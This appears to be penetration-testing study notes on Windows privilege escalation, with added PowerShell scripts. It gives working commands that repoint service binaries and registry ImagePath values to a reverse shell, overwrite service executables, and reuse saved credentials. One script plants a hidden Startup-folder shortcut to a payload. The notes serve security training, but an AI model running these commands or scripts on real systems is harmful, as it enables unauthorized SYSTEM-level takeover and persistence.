1. Enumeration
    1. System
      1. systeminfo
        1. OS name, version, build, architecture and installed hotfixes; save the output to a file, it is the input for Windows Exploit Suggester
      2. hostname
      3. wmic qfe
        1. Windows Management Instrumentation: lists installed hotfixes (KB numbers) and their install dates
      4. wmic logicaldisk
        1. Lists drives and their types; extra volumes are worth searching for credentials
    2. User
      1. whoami
        1. whoami /priv (look for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege)
        2. whoami /groups
      2. net user (and net user <username>)
        1. net user lists all local accounts; net user <username> shows that account's details and group memberships
      3. net localgroup
        1. Lists all local groups; net localgroup <group> lists a group's members
    3. Network
      1. route print
        1. Shows the interface list, the IPv4/IPv6 route tables and persistent routes; reveals other networks the host can reach
      2. netstat -ano
        1. All connections and listening ports with the owning PID; services bound only to 127.0.0.1 are candidates for port forwarding
    4. Passwords
      1. To find passwords in files
        1. findstr /si password *.txt *.ini *.config *.xml
          1. Searches for the string "password" in files with the listed extensions, case-insensitive (/i)
          2. /s starts in the current directory and recurses into every subdirectory
    5. AV FW detection
      1. sc query windefend
        1. Service control query of the Windows Defender service; STATE RUNNING means Defender is active
      2. sc query type= service
        1. Lists all running services (add state= all to include stopped ones)
      3. netsh advfirewall firewall dump
        1. Dumps the firewall rule configuration as a script
      4. netsh firewall show state
      5. netsh firewall show config
        1. Legacy firewall context (deprecated); on newer systems use netsh advfirewall show allprofiles
    6. Auto enumeration
      1. Executables
        1. winPEAS
          1. The .exe build requires .NET 4.0+ on the target; winPEAS.bat has no such dependency
        2. Seatbelt
        3. Watson
        4. SharpUp
        5. If executables are blocked (AppLocker, AV), fall back to the PowerShell scripts below
          1. If none of them works, run the local exploit suggester from a Meterpreter session: post/multi/recon/local_exploit_suggester
      2. powershell
        1. Sherlock.ps1
        2. PowerUp.ps1
        3. jaws-enum.ps1
    7. Msfconsole
      1. run post/multi/recon/local_exploit_suggester (needs an existing session; set SESSION <id>)
        1. Lists the local exploit modules whose checks pass against the session's host
    8. Manual
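The enumeration commands above, collected into one pass. This is an added example, not part of the original notes or of any of the tools named above; it uses only built-in cmdlets, wraps the native whoami output, and flags the privilege that decides whether the Potato attacks further down apply. $SearchRoot is an assumed starting point for the password search.

```powershell
# Added example: quick local enumeration pass mirroring the commands above.
# Run from an unprivileged PowerShell session on the target.

$report = [ordered]@{}

# System: OS version/build and recent hotfixes (same data as systeminfo / wmic qfe)
$os = Get-CimInstance Win32_OperatingSystem
$report.OS       = "$($os.Caption) $($os.Version) ($($os.OSArchitecture))"
$report.Hotfixes = (Get-HotFix | Sort-Object InstalledOn -Descending |
                    Select-Object -First 10 -ExpandProperty HotFixID) -join ', '

# User: identity, groups and privileges. whoami supports CSV output, which is far
# easier to parse than the default table.
$report.User   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$report.Groups = (whoami /groups /fo csv | ConvertFrom-Csv |
                  Select-Object -ExpandProperty 'Group Name') -join ', '
$privs = whoami /priv /fo csv | ConvertFrom-Csv
$report.Privileges = ($privs | ForEach-Object { "$($_.'Privilege Name')=$($_.State)" }) -join ', '
# Holding either of these (enabled or not) is the precondition for the Potato family.
$report.PotatoCandidate = [bool]($privs | Where-Object {
    $_.'Privilege Name' -in 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege' })

# Network: listening TCP ports with the owning process (netstat -ano equivalent)
$report.Listening = (Get-NetTCPConnection -State Listen | ForEach-Object {
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    "$($_.LocalAddress):$($_.LocalPort)/$($proc.Name)"
} | Sort-Object -Unique) -join ', '

# Passwords: recursive, case-insensitive search (findstr /si equivalent) limited
# to file types that commonly hold credentials. $SearchRoot is an assumption.
$SearchRoot = 'C:\Users'
$report.PasswordHits = Get-ChildItem -Path $SearchRoot -Recurse -Include *.txt, *.ini, *.config, *.xml -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password' -SimpleMatch -List |
    ForEach-Object { "$($_.Path):$($_.LineNumber)" }

# AV / firewall: Defender service state and per-profile firewall state
$report.Defender = (Get-Service -Name WinDefend -ErrorAction SilentlyContinue).Status
$report.Firewall = (Get-NetFirewallProfile | ForEach-Object { "$($_.Name)=$($_.Enabled)" }) -join ', '

$report
```

Get-NetTCPConnection and Get-NetFirewallProfile need Windows 8 / Server 2012 or later; on older hosts fall back to the netstat and netsh commands listed above.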
  2. Passwords
    1. Reg
      1. reg query HKLM /f password /t REG_SZ /s
        1. Local Machine hive; /f searches for the string, /s recurses through subkeys
      2. reg query HKCU /f password /t REG_SZ /s
        1. Current User hive
    2. Saved credentials (check cmdkey /list first to see whether any are stored)
      1. runas /savecred /user:admin C:\path\to\reverse_shell.exe
        1. Runs the binary as the saved account without prompting for its password
  3. Service Exploits
    1. Enum
      1. sc.exe qc / query / config
      2. net start / net stop
      3. winPEAS
    2. Insecure Service permissions
      1. Signs: SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS granted to our user or to a group we are in
        1. The logged-in user can change the configuration of a service that runs as LocalSystem (SYSTEM)
        2. Should also be able to start and stop the service (otherwise wait for a reboot if the service starts automatically)
        3. winPEAS shows these
          1. To check manually: .\accesschk.exe /accepteula -uwcqv user servicename
      2. To query the service configuration and see what it really runs
        1. sc qc servicename
      3. To check the current state
        1. sc query servicename
      4. If the user can modify the binary path, point it at a malicious exe and restart the service
        1. sc config servicename binpath= "C:\path\to\reverse.exe" (note the space after the = sign)
        2. net stop servicename, then net start servicename
    3. Unquoted Service Paths
      1. Usually shown by winPEAS: the binary path contains spaces and is not wrapped in quotes
      2. First check which actions are allowed on the service; we need to start/stop it or wait for a reboot
        1. .\accesschk.exe /accepteula -ucqv user servicename
      3. Then check for write permission on each directory along the binary path
        1. .\accesschk.exe /accepteula -uwdq "C:\Program Files\directory name\"
      4. If a directory is writable, drop an exe there named after the first word of the next path element (the text before its first space) plus .exe; e.g. for C:\Program Files\Unquoted Path Service\Common Files\service.exe the loader tries C:\Program.exe, then C:\Program Files\Unquoted.exe, then C:\Program Files\Unquoted Path Service\Common.exe before the real binary
    4. Weak Registry Permissions
      1. winPEAS shows that the service's registry key is modifiable
      2. To verify, check whether we can edit it
        1. cmd: .\accesschk.exe /accepteula -uvwqk HKLM\SYSTEM\CurrentControlSet\Services\servicename
        2. PS: Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\servicename | Format-List
      3. To check the current values of the key
        1. reg query HKLM\SYSTEM\CurrentControlSet\Services\servicename
        2. After verifying that it runs as LocalSystem (ObjectName value), change ImagePath to our exe path and restart the service
          1. reg add HKLM\SYSTEM\CurrentControlSet\Services\servicename /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\reverse.exe /f
    5. Insecure Service Executables
      1. IF YOU ARE DOING THIS ON A REAL SYSTEM, BACK UP THE ORIGINAL EXE BEFORE EXPLOITING
      2. Check for a service exe that is writable by Everyone or by Users; shown by winPEAS
      3. Verify with accesschk that the file is writable and that we can start/stop the service
        1. .\accesschk.exe /accepteula -quvw "C:\path\to\service.exe"
        2. .\accesschk.exe /accepteula -ucqv user servicename
      4. If yes, overwrite it with a malicious exe of the same name and restart the service
        1. copy /Y C:\path\to\reverse.exe "C:\path\to\service.exe"
    6. DLL hijacking
      1. Same idea: the service loads a DLL by name from a directory we can write to; plant a DLL with that name and restart the service
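The three service checks above (writable binary, unquoted path with a writable hijack directory, writable service registry key) in one sweep over every service. This is an added example, not part of the original notes and not winPEAS or accesschk; it reads ACLs with Get-Acl and matches them against the SIDs in the current token, since a running service's exe cannot simply be opened for writing. Deny ACEs and raw generic rights (which print as numbers) are not interpreted, so confirm every hit with accesschk before exploiting. Run as a local administrator it will, correctly, flag everything.

```powershell
# Added example: find services with a writable binary, a writable registry key,
# or an unquoted path whose hijack directory is writable by the current user.

$me        = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$tokenSids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })  # every SID our token carries

function Test-WritableByMe {
    # True if any Allow ACE for one of our SIDs carries a write-class right.
    # Get-Acl is provider-neutral, so this works for files, directories and HKLM:\ keys.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($tokenSids -notcontains $ace.IdentityReference.Value) { continue }
        # One of the two properties exists depending on the ACE type; the other is empty.
        $rights = "$($ace.FileSystemRights)$($ace.RegistryRights)"
        if ($rights -match 'FullControl|Modify|\bWrite\b|WriteData|CreateFiles|SetValue|WriteKey|CreateSubKey|ChangePermissions|TakeOwnership') {
            return $true
        }
    }
    return $false
}

function Get-ServiceExe {
    # Pull the executable out of an ImagePath, whether quoted or followed by arguments.
    param([string]$ImagePath)
    if ($ImagePath -match '^"([^"]+)"') { return $Matches[1] }
    return ($ImagePath -split ' -| /')[0]      # drop arguments such as "-k netsvcs"
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $path = $svc.PathName
    if (-not $path) { continue }
    $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceExe $path))

    # Unquoted path with spaces: the loader tries each prefix truncated at the first
    # space (C:\Program.exe, C:\Program Files\Unquoted.exe, ...). Report every
    # candidate whose parent directory we can write to.
    $drops = @()
    if ($path -notmatch '^"' -and $exe -match ' ') {
        $parts = $exe -split '\\'
        for ($i = 1; $i -lt $parts.Count; $i++) {
            if ($parts[$i] -notmatch ' ') { continue }
            $dir  = ($parts[0..($i - 1)] -join '\') + '\'
            $name = ($parts[$i] -split ' ')[0] + '.exe'
            if (Test-WritableByMe $dir) { $drops += (Join-Path $dir $name) }
        }
    }

    $binWritable = Test-WritableByMe $exe
    $keyWritable = Test-WritableByMe "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"

    if ($drops -or $binWritable -or $keyWritable) {
        [pscustomobject]@{
            Service        = $svc.Name
            RunsAs         = $svc.StartName     # LocalSystem is the prize
            State          = $svc.State
            ImagePath      = $path
            WritableBinary = $binWritable
            WritableRegKey = $keyWritable
            UnquotedDrop   = ($drops -join '; ')
        }
    }
}

$findings | Format-List
```

A hit is only useful if the service runs as LocalSystem (or another privileged account) and you can restart it or wait for a reboot, which is what the accesschk -ucqv check above tells you.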
  4. Kernel Exploits
    1. https://github.com/SecWiki/windows-kernel-exploits (precompiled exploits indexed by KB/CVE)
    2. Everything depends on enumeration
    3. Identify the OS version/build and the missing patches, then search for matching exploits
    4. Tools
      1. Windows Exploit Suggester
        1. Takes the saved systeminfo output file as input
      2. Watson
  5. Scheduled Tasks
    1. cmd: schtasks /query /fo LIST /v
    2. ps: Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
    3. Look for tasks that run every minute (or on a short interval) as a privileged account; if the script they run is writable, append a command that launches our shell to get a shell as NT AUTHORITY\SYSTEM
    4. To check permissions on the script: .\accesschk.exe /accepteula -uqv user C:\path\to\script.ps1 (look for FILE_ALL_ACCESS or FILE_WRITE_DATA)
    5. Alternatively replace the script's command with the path to a malicious executable
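The scheduled task check above as a script: every task outside the \Microsoft\ tree with the account it runs as, its trigger type and repetition interval, and whether the current user can open the program or script it executes for writing. This is an added example and not part of the original notes; the write probe actually opens the file, which unlike an ACL read also reflects deny ACEs, so a false here is reliable.

```powershell
# Added example: find non-Microsoft scheduled tasks whose target we can modify.

function Test-CanOpenForWrite {
    # Probe by opening the file for write; sharing locks and deny ACEs both surface here.
    param([string]$Path)
    try { [System.IO.File]::Open($Path, 'Open', 'Write').Dispose(); $true } catch { $false }
}

function Get-TaskTarget {
    # Resolve what a task action really runs: expand environment variables, strip
    # quotes, and when an interpreter is launched with a script argument, prefer
    # the script (that is the file you would append a command to).
    param($Action)
    $target = [Environment]::ExpandEnvironmentVariables($Action.Execute).Trim('"')
    if ($Action.Arguments -match '([A-Za-z]:\\[^"]+?\.(ps1|bat|cmd|vbs))') { $target = $Matches[1] }
    return $target
}

$results = foreach ($task in Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' }) {
    # Only exec actions have a file to check; COM handler actions are skipped.
    foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
        $target = Get-TaskTarget $action
        [pscustomobject]@{
            Task     = $task.TaskPath + $task.TaskName
            RunAs    = $task.Principal.UserId        # SYSTEM or an admin is what we want
            State    = $task.State
            Triggers = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
            Repeats  = ($task.Triggers | ForEach-Object { $_.Repetition.Interval } | Where-Object { $_ }) -join ','  # e.g. PT1M
            Target   = $target
            Writable = (Test-Path -LiteralPath $target) -and (Test-CanOpenForWrite $target)
        }
    }
}

$results | Sort-Object Writable -Descending | Format-Table -AutoSize
```

Get-ScheduledTask is only available on Windows 8 / Server 2012 and later; the schtasks command above gives the same information on older hosts, although in a format that needs manual reading.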
  6. Insecure GUI APPS
    1. If a GUI app runs as an administrator, anything it launches (e.g. cmd.exe started through its File > Open dialog) inherits the administrator token
    2. To see which user a process runs as: tasklist /v | findstr processname
  7. StartUp Apps
    1. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp: programs placed here run for every user at logon (not at boot)
      1. If a reverse shell is placed in this directory, it executes the next time any user, including an administrator, logs in
    2. .\accesschk.exe /accepteula -d path
      1. To check access permissions on the directory
      2. Exploitable if BUILTIN\Users has write access to it (a misconfiguration, not the default)
    3. Use a VBScript (widely available online) that creates a shortcut (.lnk) to the payload in the startup directory
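The startup-folder check and shortcut creation above as one script. This is an added example, not part of the original notes; it uses the same WScript.Shell COM object the VBScript method relies on, so the resulting .lnk is identical, and it only plants the shortcut after proving the folder is writable by actually creating a file there. $Payload is an assumed path to a reverse shell you have already staged on the host.

```powershell
# Added example: probe the all-users Startup folder and plant a shortcut there.

$StartUp = Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp'
$Payload = 'C:\Temp\reverse.exe'   # assumed; stage your own binary here first

function Test-DirWritable {
    # Create and delete a throwaway file: the only test that reflects the effective ACL.
    param([string]$Dir)
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try { [System.IO.File]::Create($probe).Dispose(); Remove-Item -LiteralPath $probe -Force; $true }
    catch { $false }
}

function New-StartupShortcut {
    # Equivalent of the VBScript approach: WScript.Shell.CreateShortcut(...).Save()
    param([string]$Target, [string]$Name = 'Update.lnk')
    $shell    = New-Object -ComObject WScript.Shell
    $shortcut = $shell.CreateShortcut((Join-Path $StartUp $Name))
    $shortcut.TargetPath       = $Target
    $shortcut.WorkingDirectory = Split-Path $Target -Parent
    $shortcut.WindowStyle      = 7          # start minimized, less visible at logon
    $shortcut.Save()
    return $shortcut.FullName
}

if (Test-DirWritable $StartUp) {
    "Startup folder is writable; Allow ACEs for reference:"
    (Get-Acl -LiteralPath $StartUp).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' } |
        Format-Table IdentityReference, FileSystemRights -AutoSize
    New-StartupShortcut -Target $Payload
} else {
    "No write access to $StartUp"
}
```

The shortcut fires in the context of the next account that logs on, so the listener must stay up until an administrator signs in; remove the .lnk once you have the shell.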
  8. Installed Apps
    1. Exploits can be found for specific apps installed on the system; search for the exact product and version on Exploit-DB
  9. Hot Potato
    1. Works on Windows 7, 8, early Windows 10 builds and Server 2008/2012
    2. It is a local NBNS/WPAD spoofing attack
    3. It tricks a Windows service into authenticating to a fake local HTTP proxy using NTLM
    4. That NTLM authentication is relayed to the local SMB service to get command execution as SYSTEM
    5. Requires a shell as a normal user; privileges are then escalated by running potato.exe with the local IP and a reverse shell exe generated with msfvenom as arguments
  10. Juicy Potato
    1. Takes advantage of service accounts that hold SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
    2. Coerces a SYSTEM-level COM server into authenticating to a local listener and uses the resulting token to impersonate SYSTEM
    3. Check whoami /priv: if SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is present, JUICY POTATO
      1. Does not work on Windows 10 1809+ / Server 2019; PrintSpoofer or RoguePotato cover those
    4. HackTricks has good info about its usage
  11. Port Forwarding
    1. plink (PuTTY's command-line SSH client): set up a remote port forward from the target back to the attacker to reach services bound only to localhost
  12. Priv Esc Strategy
    1. Check your user and the groups you are in with whoami /groups and net user <username>
  13. Download Tib3rius's GitHub repo (accesschk and the other tools used above)
  14. Enumeration Scripts
    1. Windows Exploit Suggestor
        1. ./windows-exploit-suggester.py --update (downloads the Microsoft bulletin database)
        2. ./windows-exploit-suggester.py --database <date>-mssb.xls --systeminfo systeminfo.txt
    2. Winpeas
        1. x86 and x64 .exe builds (need .NET 4.0+) and a .bat version with no dependency
  15. By Kaustubh chude
    1. https://www.linkedin.com/in/kaustubh-chude-3124801a7